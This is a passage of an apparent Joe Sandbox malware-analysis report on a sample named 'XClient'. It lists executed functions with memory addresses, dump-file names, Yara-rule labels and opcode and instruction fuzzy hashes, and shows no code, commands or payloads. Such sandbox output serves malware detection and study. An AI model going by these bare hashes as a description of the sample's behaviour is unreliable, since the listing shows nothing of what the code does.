                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction ID: c31209bc7ddbffe4271f8111a39143880db0245c3a10df0949632d9cf4825eab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A122059 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 754d4afe8c3658d7de39e20f4126e46c3ed5299aac53d837afb253b660c0469a
                                                                                                                                                                                                                                  • Instruction ID: 9c67d1bf5cbb22309a82825c35546bb47316ecdbd021d533d5f3d97a62af4951
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 754d4afe8c3658d7de39e20f4126e46c3ed5299aac53d837afb253b660c0469a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8514591A1E6C54FD396AB3C88682B9BFD5DF87215B1804FAE08DC71A3ED189C06C346
                                                                                                                                                                                                                                  Function 00007FFB4A121185 Relevance: .6, Instructions: 580COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3d08e741f23c3daa7e8e46778f4f4b6a7c67351295630c013dba3acaff6c7daa
                                                                                                                                                                                                                                  • Instruction ID: a7021dc12e6a8a6ff64cb7743a6407dc307c490c1b86cb9ab3c9bec39465f943
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d08e741f23c3daa7e8e46778f4f4b6a7c67351295630c013dba3acaff6c7daa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1231A0B3D0E68A4FE742EFBCC8A51E97BB1EF86210B1501F6D485DB193DD2868058B91
                                                                                                                                                                                                                                  Function 00007FFB4A1211F8 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 685fbb713f900c546fad009c22763421e1577d33522561c020dc228b32af02ee
                                                                                                                                                                                                                                  • Instruction ID: 7094ada5aac0a2fc635963eb5998e4d538bc0bad6e779347792b44f7ffd2104c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 685fbb713f900c546fad009c22763421e1577d33522561c020dc228b32af02ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A021A2A290DA8A4FE741EFB8CDB50ED7BB1FF46200F5501F6D085E31D2DD2868058781
                                                                                                                                                                                                                                  Function 00007FFB4A120C3E Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4d2ce285f8d252a1675157367a6d4ddcbbc7cbcb0b25c7df7064530494205bc9
                                                                                                                                                                                                                                  • Instruction ID: 06a3ecd1e208ff71cffbcb2b3e3371befb01446e8ed350a4eb8bf970e241ee33
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2ce285f8d252a1675157367a6d4ddcbbc7cbcb0b25c7df7064530494205bc9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98511461A0E6CA0FE357AA7898562757FD2DF8721071900FBD889C7193DC1CAC428752
                                                                                                                                                                                                                                  Function 00007FFB4A1216C9 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 805c4344bd87f7887e14c8ccdb7fcdb0fafecd15a38e09c2469fa31954ae3f19
                                                                                                                                                                                                                                  • Instruction ID: 3f9d59a6e5def9ea693211e99f3bb7e44d5041d28e900aae445d21766a464a1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 805c4344bd87f7887e14c8ccdb7fcdb0fafecd15a38e09c2469fa31954ae3f19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51A775A1D64D8FDB98FF7CC9695A97BE2FF46201B9001B5E44ED3292DE389801C701
                                                                                                                                                                                                                                  Function 00007FFB4A120540 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b2b2dd0bef0e8b10d4e637ed1df12482808a5db8d9440bd8f3efdbbbe7c391ed
                                                                                                                                                                                                                                  • Instruction ID: b2be59dd658b54c72e5a00cef2e0b58a920b3e102bcecb775d783e8247dfd37b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2b2dd0bef0e8b10d4e637ed1df12482808a5db8d9440bd8f3efdbbbe7c391ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB31B561B1D9490FE789BF3C885A77DB6C2EF99311F1405BAE44EC32A3DD689C418385
                                                                                                                                                                                                                                  Function 00007FFB4A120AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ba4b520a419871787c293fab1fd53828a8acad82a958225bc37aee8e869a7a60
                                                                                                                                                                                                                                  • Instruction ID: 806f557dc2a5a91b41530d89226a90d264cb54dd850d1d8810c34559b3613e5d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba4b520a419871787c293fab1fd53828a8acad82a958225bc37aee8e869a7a60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E031C2A2B1D9464FF745BBBC98593BC77D2EF99211F1402BBE40CC3292DD289C418792
                                                                                                                                                                                                                                  Function 00007FFB4A120985 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a37dbae6790d68b5049fd883f89c37faedf1a54f09a719c82bec4214bccb6878
                                                                                                                                                                                                                                  • Instruction ID: 5f9d8f6e3d544b837cac46e8a3c8903ecb0985fb128e01252964d9a3f4d88f24
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37dbae6790d68b5049fd883f89c37faedf1a54f09a719c82bec4214bccb6878
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 263191B1A1894E8FEB45FF78C8657AD77A2FF99301F600575D409D3286CE38A8418751
                                                                                                                                                                                                                                  Function 00007FFB4A12083D Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 71c2d3aa07b8285b0d2ee90cd5e88f750115c8d4b39fe82714c9d8fa1ce17d6a
                                                                                                                                                                                                                                  • Instruction ID: a1a6790985e75b7aa59efa1170538e61be619d140b3a10f245f09391f88aa917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71c2d3aa07b8285b0d2ee90cd5e88f750115c8d4b39fe82714c9d8fa1ce17d6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76310865A0D6CE8FD785FF6CC8545B97FA2FF85206BA040B6D44DD378ACE249900C751
                                                                                                                                                                                                                                  Function 00007FFB4A122211 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
                                                                                                                                                                                                                                  • Instruction ID: f05a983c64673d12cf99d4c0033a19f9aad8a9fce3a71e61fc128ff35009c5b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501455280C6C10FE752BF3888658757FE8CF92251B1809FAE8C8DA1A3CC09A841C753